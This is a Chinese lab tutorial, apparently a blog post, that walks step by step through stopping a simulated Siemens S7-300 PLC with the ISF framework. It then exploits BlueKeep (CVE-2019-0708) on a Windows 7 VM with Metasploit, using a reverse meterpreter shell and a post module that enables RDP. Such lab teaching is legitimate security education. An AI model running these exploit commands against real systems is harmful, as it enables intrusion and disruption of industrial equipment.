西门子S7-300启停

一、西门子S7-300启停

1.安装Vmware workstaion和Kali linux等软件,配置虚拟环境
2.kali中安装工控漏洞利用框架 ISF
(1)在kali终端中使用命令:
git clone https://github.com/dark-lbp/isf/
在这里插入图片描述

(2)输入cd isf
在这里插入图片描述

(3)这时有可能会报错:缺少nmap模块,方法:
A.克隆下载nmap模块的包
git clone https://github.com/johanlundberg/python-nmap
在这里插入图片描述

B.进入文件夹使用命令python2 setup.py install
在这里插入图片描述

C.进入python2中import nmap发现没有报错了,使用exit()退出
在这里插入图片描述

D.继续执行 python2 isf.py命令进行安装
在这里插入图片描述

3.使用snap7模拟PLC设备,解压压缩包,打开 \rich-demos\x86_64-win64\bin路径
(1).用ipconfig查看本机ip,也即物理机IP,填写到serverdemo.exe中
(2)在serverdemo.exe界面先点击start启动server
在这里插入图片描述

(3)可以查看到serverdemo.exe下面日志就显示serverstarted
(4)clientdemo.exe界面上填写上物理机ip
(5)clientdemo.exe界面上点击connect连接
在这里插入图片描述

(6)这时继续查看server的日志,显示client已经added(serverdemo.exe)
4.打开ISF后,输入:
use exploits/plcs/siemens/s7_300_400_plc_control
在这里插入图片描述

5.show options;set target 物理机IP
在这里插入图片描述

6.run
在这里插入图片描述

这里显示 stop plc ,同时查看模拟器中的输出,可以发现已经停止
在这里插入图片描述

二、利用windows 7 cve-2019-0708漏洞

环境准备
说明:该漏洞存在于Windows系统的Remote Desktop Services(远程桌面服务)(端口3389)中,未经身份验证的攻击者可以通过发送特殊构造的数据包触发漏洞,可能导致远程无需用户验证控制系统。
这意味着该漏洞可以通过网络蠕虫的方式被利用,利用此漏洞的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机。

在这里插入图片描述

1.开启Kali虚拟机和win7靶机
2.在win7虚拟机的命令窗口输入:netstat -an,查看打开的端口:
在这里插入图片描述
3.若3389没打开,可以右键计算机,选择属性
在这里插入图片描述

4.选择远程设置
在这里插入图片描述
5.选择允许远程连接
在这里插入图片描述

7.5.2 利用windows 7 cve-2019-0708漏洞案例
1.kali中使用nmap扫描目标机器端口确认是否开启3389端口:
nmap 192.168.11.133(win7IP)
在这里插入图片描述

2.确认开启后启动msfconsole
在这里插入图片描述

  1. 搜索漏洞:
    search 0708
    在这里插入图片描述

前两个模块,一个是扫描功能,一个是攻击功能。
4.使用攻击功能,也就是第二个模块:
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
在这里插入图片描述
5.设置目标:
set rhost 被攻击ip #设置win7ip
set rport 3389

在这里插入图片描述

6.设置payload:
set payload windows/x64/meterpreter/reverse_tcp #设置64位的payload如果是32位机器则不用加x64
在这里插入图片描述

7.设置攻击机:
set lhost 攻击者ip #设置kali的ip
set lport 4444 #设置攻击者的监听端口(端口可以随意更改)
在这里插入图片描述

8.输入:show targets,显示可以选择的靶机的架构
在这里插入图片描述
9.用于vm是15.5.1,所以可以选择target 3-5
在这里插入图片描述

10.选择target 3,进行尝试:
set target 5
11.进行攻击,运行:run
在这里插入图片描述

12.假如可以建立连接,输入:
run post/windows/manage/enable_rdp
运行远程桌面模块
在这里插入图片描述

13.另开一个kali终端,输入:
rdesktop win7靶机IP
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值